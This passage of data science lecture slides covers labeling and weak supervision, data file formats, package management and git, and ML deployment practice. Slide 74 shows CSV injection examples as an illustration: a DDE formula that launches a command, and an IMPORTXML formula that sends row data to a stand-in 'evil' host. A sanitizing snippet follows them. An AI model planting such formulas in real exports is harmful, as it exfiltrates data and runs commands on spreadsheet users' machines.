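    unlabeled = [x for x in pool if x not in labeled]
    query = min(unlabeled, key=lambda x: abs(x - threshold))
    labeled[query] = oracle(query)

threshold = fit_threshold(labeled)
```

After 20 labels out of 200 points the cut-off sits close to the true boundary, because the labeling effort is spent where the model is uncertain rather than spread over the whole pool.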
67 Labeling
https://github.com/koaning/human-learn
68 Labeling
“Absolutely brilliant. Ever since taking ML classes in MSc and then again in PhD I have wondered why no machine learning approach ever applies such an obvious technique. And most real world datasets are probably adequately addressed with this approach, and everyone regardless of technical background can understand it. ML no longer has to be an inscrutable black box mystery.
As for the “let’s just draw the model” idea, it gets complicated as soon as you’re dealing with more than one input parameter. The author has some workarounds, it looks like.
Being able to project the data into a latent space where classes can be separated is what makes modern ML so valuable.
I don’t understand why this approach is valuable. If you can label your examples using traditional software, why would you build a model? Why not just use the label function in whatever context you intended the model to exist?”
69 Labeling
Snorkel Flow: https://snorkel.ai/platform/
Snorkel: https://github.com/snorkel-team/snorkel
Snorkel: Rapid Training Data Creation with Weak Supervision: https://arxiv.org/abs/1711.10160
“Humans provide accidental regularization - and a human made decision boundary can have further fine-tuning by an expert. Even better if you have a generative model which can “hallucinate” parts of the decision boundary which don’t have points. Now you can “probe” your model and have a human intervene if they think parts of the decision boundary are wrong.”
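The weak supervision idea behind Snorkel can be illustrated without the library itself: several cheap, noisy labeling functions each vote on an example or abstain, and the votes are combined into a training label. The sketch below uses plain majority voting, which is a deliberate simplification (Snorkel learns a label model that weighs the functions instead), and the labeling functions and messages are made up.

```python
from collections import Counter

ABSTAIN, HAM, SPAM = -1, 0, 1

# Hypothetical labeling functions: hand-written heuristics, each allowed to abstain
def lf_contains_link(text):
    return SPAM if "http" in text else ABSTAIN

def lf_mentions_prize(text):
    return SPAM if "prize" in text.lower() else ABSTAIN

def lf_starts_with_greeting(text):
    return HAM if text.lower().startswith(("hi", "hello")) else ABSTAIN

LABELING_FUNCTIONS = [lf_contains_link, lf_mentions_prize, lf_starts_with_greeting]

def weak_label(text):
    """Combine the non-abstaining votes by simple majority."""
    votes = [lf(text) for lf in LABELING_FUNCTIONS]
    votes = [vote for vote in votes if vote != ABSTAIN]
    if not votes:
        return ABSTAIN
    return Counter(votes).most_common(1)[0][0]

messages = [
    "Hello, are we still meeting tomorrow?",
    "You won a prize! Claim it at http://example.com",
    "Quarterly report attached",
]
labels = [weak_label(message) for message in messages]
```

Examples on which every function abstains stay unlabeled; the rest become (noisy) training data for an ordinary supervised model.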
70 Labeling
Also see:
FlyingSquid: https://github.com/HazyResearch/flyingsquid
Alteryx Compose: https://github.com/alteryx/compose
71 File Formats
72 In which format do we store our data?
You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:
How fast is it to serialize data (write)?
How fast can it be read in?
How large is it?
Column or row based?
Easy to distribute?
Easy to modify schema?
73 Text based formats
CSV, TSV, JSON, XML
Convenient to exchange with other applications or scripts
Human readable
Bulky and not efficient to query without reading whole structure in memory first
Hard to infer schema
Compression applies on file-level
Still one of the most common formats
74 Text based formats
UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240

http://georgemauer.net/2017/10/07/csv-injection.html
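The CSV injection rows above work because spreadsheet programs evaluate cells that look like formulas. One commonly suggested mitigation, sketched below, is to neutralize such cells when writing the file. The helper name `neutralize` and the list of prefixes are assumptions made for illustration, and the approach is blunt: it also alters legitimate text values that start with a minus or plus sign.

```python
import csv
import io

FORMULA_PREFIXES = ("=", "+", "-", "@")

def neutralize(cell):
    """Prefix formula-like text with an apostrophe so it is displayed, not evaluated."""
    if isinstance(cell, str) and cell.startswith(FORMULA_PREFIXES):
        return "'" + cell
    return cell

rows = [
    ["UserId", "BillToDate", "ProjectName", "Description", "DurationMinutes"],
    [1, "2017-07-25", "Test Project", "Flipped the jibbet", 60],
    [2, "2017-07-25", "Important Client", "=2+5+cmd|' /C calc'!A0", 240],
]

# Write to an in-memory buffer instead of a real file
buffer = io.StringIO()
writer = csv.writer(buffer)
for row in rows:
    writer.writerow([neutralize(cell) for cell in row])

# Read the result back to inspect what a consumer would see
safe_rows = list(csv.reader(io.StringIO(buffer.getvalue())))
```

Numeric cells pass through unchanged because only string values are checked.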
75 Text based formats
76 Sequence files
A persistent data structure for binary key-value pairs
“Serialized Java objects”
Row-based
Commonly used to transfer data in map-reduce jobs (see later)
Compression applies on row level
Less popular in recent years, not portable
77 Optimized Row Columnar (ORC)
Evolution of the older RCFile
Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based)
Lightweight indexing
Splittable
Less popular in recent years
78 Apache AVRO
Widely used as serialization format
Row-based, compact binary format
Schema is included in the file
Supports schema evolution
  Add, rename and delete columns
Compression on record level
https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/
79 Apache Parquet
Column-oriented binary file format
Efficient when specific columns are queried
Common in data science
Parquet is built to support very efficient compression and encoding schemes
Parquet allows compression schemes to be specified on a per-column level
Good support for schema evolution
  Can add columns at the end
80 SQLite files
Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large
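As a small illustration of the points above (multiple tables, schema evolution, SQL querying), here is a sketch using Python's built-in `sqlite3` module. The table and column names are made up for the example, and an in-memory database is used; passing a file path to `sqlite3.connect` instead would produce a single SQLite file on disk.

```python
import sqlite3

# ":memory:" keeps the example self-contained; use a path such as "data.sqlite"
# (hypothetical name) to get an actual file.
conn = sqlite3.connect(":memory:")

# Multiple tables in one store.
conn.execute("CREATE TABLE projects (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute(
    "CREATE TABLE timesheet (user_id INTEGER, project_id INTEGER, minutes INTEGER)"
)
conn.executemany(
    "INSERT INTO projects VALUES (?, ?)",
    [(1, "Test Project"), (2, "Important Client")],
)
conn.executemany(
    "INSERT INTO timesheet VALUES (?, ?, ?)",
    [(1, 1, 60), (2, 2, 240), (2, 2, 240)],
)

# Schema evolution: add a column to an existing table.
conn.execute("ALTER TABLE timesheet ADD COLUMN billed INTEGER DEFAULT 0")
columns = [row[1] for row in conn.execute("PRAGMA table_info(timesheet)")]

# SQL querying across tables.
totals = conn.execute(
    """
    SELECT p.name, SUM(t.minutes)
    FROM timesheet AS t
    JOIN projects AS p ON p.id = t.project_id
    GROUP BY p.name
    ORDER BY p.name
    """
).fetchall()

print(columns)
print(totals)
```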
81 HDF5
HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex
82 Kudu
Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes
83 Apache Arrow
Engineers from across the Apache Hadoop community established Arrow as a de-facto standard for columnar in-memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
84 Feather
A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow
“One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model. In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that could be used by both languages.”
Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames
Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance
85 Feather
library(feather)
path <- "my_data.feather"
write_feather(df, path)
df <- read_feather(path)

# Analogously, in Python, we have:
import feather
path = 'my_data.feather'
feather.write_dataframe(df, path)
df = feather.read_dataframe(path)
86 What to take away from this?
Be prepared to deal with different data sources
AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data Feather currently a popular choice for data science
Future: Arrow/Feather + Parquet
Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach
87 Packaging and Versioning Systems
88 Packaging
You’ll commonly encounter “package managers” when working in your preferred ecosystem
“A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs for a computer’s operating system in a consistent manner.”
Management of installs and updates Avoiding conflicts Resolving dependencies
89 Virtual environments
This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection of packages
The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome
90 In Python and R
R comes with its own package management system, which allows you to download packages from a repository E.g. install.packages(...)
Virtual environments can be set up using packrat
Python has had a lot of package managers, but the most common one nowadays is pip Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy
Virtual environments can be set up using virtualenv
Or you can use conda: Anaconda’s package manager and virtual environment manager in one Includes more than just Python packages, also R and other tools are included Hence also allows to set up clean isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf To isolate a complete environment, virtualization and containerization tools like Docker are commonly used as well
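To make the idea of an isolated environment concrete, here is a minimal sketch that uses Python's standard-library `venv` module. This is a stand-in for the virtualenv and conda tools named above, not the same tool. The directory names are hypothetical, and `with_pip=False` is chosen only to keep the example fast. In practice you would usually create the environment from the command line and install packages into it with pip.

```python
import tempfile
import venv
from pathlib import Path

# A throwaway project directory (hypothetical layout, for illustration only).
project_dir = Path(tempfile.mkdtemp(prefix="demo_project_"))
env_dir = project_dir / ".venv"

# Create an isolated environment with its own interpreter and site-packages.
venv.create(env_dir, with_pip=False)

# pyvenv.cfg records which base interpreter the environment was created from.
config_file = env_dir / "pyvenv.cfg"
print(config_file.read_text())
```

Keeping one such environment per project follows the same rule of thumb given above for conda environments.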
91 Versioning systems
Something else to read up on is the use of version control systems
“Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing disruption to all team members.”
Even a good idea to use this for a “team of one” SVN, CVS, Mercurial, Bazaar Most common one is git
92 git
“Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development.
As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server.
Git is free and open-source software distributed under the terms of the GNU General Public License version 2.”
GitHub: hosts git repositories for you (free) GitLab: an alternative
93 git
GitHub Desktop
94 git
A good way to practice is to put your code, data science projects, or even your blog on GitHub
E.g. feel free to try this for an assignment
Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked on and collaborated on
95 Model Deployment
96 Context
Recall from the evaluation session that evaluation doesn’t stop at deployment
Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511) In real-world machine learning systems, only a small fraction is comprised of actual ML code There is a vast array of surrounding infrastructure and processes to support their evolution Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world
97 Context
A simple straight-through process?
98 Common deployment issues
Lineage of data dependencies
Metadata management Ensuring that data is available to the model at prediction-time This includes all pre-processing steps that are applied to the data! Different data sources, one-off data sources used during training
99 Common deployment issues
Deployment context
Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?
100 Common deployment issues
Development governance
Is the training code well-documented? How is collaboration, versioning handled? Can the training run be easily reproduced, e.g. to re-train the model periodically? The “runs on my machine” phenomenon
101 Common deployment issues
Model governance
How is the model deployed? A common platform, using containerization or virtualization, ad-hoc? Is versioning support provided for models? Models as data: can output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated?)
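The questions above about model versioning, lineage and metadata can be made tangible with a small sketch. It builds a metadata record for a model artifact using only the standard library. The record fields, the function name `build_model_record` and the model name are all hypothetical, and the "model" is a plain dictionary standing in for a trained estimator. Dedicated model registries cover far more than this.

```python
import hashlib
import json
import pickle
from datetime import datetime, timezone


def build_model_record(model, name, version, training_data_bytes):
    """Collect basic governance metadata for one build of a model."""
    artifact = pickle.dumps(model)
    return {
        "name": name,
        "version": version,
        # When was the model last updated?
        "trained_at": datetime.now(timezone.utc).isoformat(),
        # Fingerprint of the serialized model artifact.
        "artifact_sha256": hashlib.sha256(artifact).hexdigest(),
        # Lineage: fingerprint of the data the model was trained on.
        "training_data_sha256": hashlib.sha256(training_data_bytes).hexdigest(),
    }


# Stand-in for a trained model (assumption: any picklable object works here).
model = {"intercept": 0.5, "coefficients": [1.2, -0.7]}
training_data = b"id,feature,label\n1,0.3,0\n2,0.9,1\n"

record = build_model_record(model, "churn_model", "1.0.0", training_data)
print(json.dumps(record, indent=2))
```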
102 Common deployment issues
Monitoring
Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?
103 Common deployment issues
Many of these issues are well known in traditional software engineering
Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)
In the context of ML productionization, many of these are hard to apply
ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models-degrade-in-production-d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline-understanding-model-degradation-machine-learning-models, https://mlinproduction.com/model-retraining/) Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…) Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time A solid model governance infrastructure is key! AIops, MLops
104 Common deployment issues
Many of these issues are well known in traditional software engineering
https://www.tecton.ai/blog/devops-ml-data/
“In stark contrast to software engineering, data science doesn’t have a well-defined, fully automated process to get into production quickly.”
105 Deployment platforms
Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner flow, Spotify’s Luigi and Airbnb’s Airflow, Netflix’ ML Platform, Airbnb’s Bighead
106 Deployment principles
(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns
107 (Meta)Data management
The issue: during model development, data sources are typically dispersed and entangled, and it is hard to keep track of the data used during a model’s construction. Definitions are unclear or unavailable
A common source of data should be set up and used both during model development and in production
Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines
Don’t split up the data layer in “raw”, “processed” and “final” stages: data is always raw and never final, focus instead on integrating the different sources in a common platform
When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer
Consider for every data input whether the data will be available at prediction-time in a timely manner
Set up a structured data dictionary containing data definitions and metadata information. This includes data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements from being used where this is not permitted
Both data and metadata come with versioning: keep historical records available. I.e. you should be able to retrieve the state of the data as it was during training. This applies to streaming data as well: typically retained in a historical repository to be used when (re)training or using models
Make sure that predictions of models are ingested in the data layer, if they are to be used as an input for other models
108 Train-run integration: reproducibility and testing
The issue: it is hard to re-train an (outdated) model, code used during development is in a separate environment and of lower quality than the code that gets deployed in the production environment
Aim for a reproducible pipeline: the resulting artifact of training code should be directly deployable in production
Keep track of each “build” of the model to allow for versioning
This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream: e.g. when using Kafka, Apache Pulsar, Spark Streams)
After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions. Report errors whilst building and running the model
Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, Tensorflow, …), but do allow for flexibility (e.g. using Python libraries) within a well-defined context
Isolate the runtime environment per model
Allow for an updated model to “run silently” along with the current version so you’re free to test the model for a while and analyze its results (“Canary” or “shadow” deployment)
Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end-users and integrators
Same for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables
109 Monitoring, logging and alerting
The issue: models fail silently, their accuracy decreases over time, and changing data definitions might lead to models using those data elements suddenly failing
See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML Test Score? A rubric for ML production systems
Set up a common monitoring and logging platform
Keep track of inputs provided to the model
Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve?
Keep track of model outputs as well over time
Does the probability distribution of the model change over time? Does usage decrease? Do predictions fail? How long does it take to call the model?
Repeated backtesting or repeated control experiments are even better, but harder
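One way to check whether the distribution of an input feature is changing is a stability index that compares binned shares between training data and recent production data. The sketch below computes the commonly used population stability index. This is an assumption about what the "system stability index" mentioned above refers to, and the bin edges, feature values and function names are made up for illustration.

```python
import math


def bin_shares(values, edges, floor=1e-6):
    """Share of values falling in each bin defined by sorted bin edges."""
    counts = [0] * (len(edges) + 1)
    for value in values:
        # The bin index equals the number of edges at or below the value.
        index = sum(value >= edge for edge in edges)
        counts[index] += 1
    total = len(values)
    # A small floor avoids log(0) and division by zero for empty bins.
    return [max(count / total, floor) for count in counts]


def population_stability_index(expected, actual, edges):
    """Sum over bins of (actual - expected) * ln(actual / expected)."""
    expected_shares = bin_shares(expected, edges)
    actual_shares = bin_shares(actual, edges)
    return sum(
        (a - e) * math.log(a / e) for e, a in zip(expected_shares, actual_shares)
    )


# Hypothetical feature values: ages seen during training vs. in production.
training_ages = [22, 25, 31, 38, 41, 47, 52, 58, 63, 67]
production_ages = [41, 45, 52, 55, 58, 61, 63, 66, 69, 72]
edges = [30, 40, 50, 60]

psi_same = population_stability_index(training_ages, training_ages, edges)
psi_shifted = population_stability_index(training_ages, production_ages, edges)
print(psi_same, psi_shifted)
```

An index of zero means the binned distributions are identical; larger values indicate a larger shift, and the alerting threshold is a choice to be made per feature and use case.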
110 Monitoring, logging and alerting
https://zenml.io/why-ZenML/
https://www.monalabs.io/
111 Monitoring, logging and alerting
https://evidentlyai.com/
112 Runtime patterns
The issue: where do models run? How will they be exposed in the organization?
Two common patterns: Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being saved to the data layer, e.g. to Hadoop, an FTP server, a relational database table, an Excel file Pull: the model is deployed as an API or microservice to be queried by outside consumers … to be used by web apps, mobile apps, BI dashboards, reports… In both cases, an isolated runtime environment needs to be provided!
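The two patterns can be contrasted in a short sketch. The "model" is a stand-in scoring function, the data layer is an in-memory SQLite table, and `handle_request` only mimics what an API endpoint would do without starting a web server. All names, including the version label, are hypothetical.

```python
import sqlite3

MODEL_VERSION = "v1"  # hypothetical version label stored with every output


def predict(features):
    """Stand-in for a trained model: a capped linear score on one feature."""
    return min(1.0, 0.1 * features["visits"])


def run_batch(conn, customers):
    """Push pattern: score a batch and save the outputs to the data layer."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS predictions "
        "(customer_id INTEGER, model_version TEXT, score REAL)"
    )
    conn.executemany(
        "INSERT INTO predictions VALUES (?, ?, ?)",
        [(c["customer_id"], MODEL_VERSION, predict(c)) for c in customers],
    )
    conn.commit()


def handle_request(payload):
    """Pull pattern: answer a single request, as an API endpoint would."""
    return {"model_version": MODEL_VERSION, "score": predict(payload)}


conn = sqlite3.connect(":memory:")
run_batch(conn, [{"customer_id": 1, "visits": 3}, {"customer_id": 2, "visits": 25}])
stored = conn.execute(
    "SELECT customer_id, score FROM predictions ORDER BY customer_id"
).fetchall()
response = handle_request({"customer_id": 7, "visits": 5})

print(stored)
print(response)
```

In the push case consumers read stored scores from the table; in the pull case they call the model when they need a score, so latency and availability of the model itself become part of the contract.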
113 Runtime patterns
Isolated runtime environments
Each deployed version of a model comes with its own environment E.g. Python version, packages used and their version, other supporting executables and libraries Different levels of isolation are possible Environment isolation: e.g. using Python virtual environments, Anaconda environments (e.g. each model runs in its own Anaconda environment) Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (e.g. each model runs in its own Docker container above a shared OS layer) Virtualization: full OS stack is isolated on top of a hardware emulation layer Serverless: models are deployed using e.g. AWS Lambda, Azure Functions, Google Cloud Functions Typically combined with data layers in the cloud as well Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting
114 Closing
Trade-off between flexibility and robustness: allowing for experimentation for ad-hoc, new or experimental projects is still fine
Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks
Not all models end as an API
In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?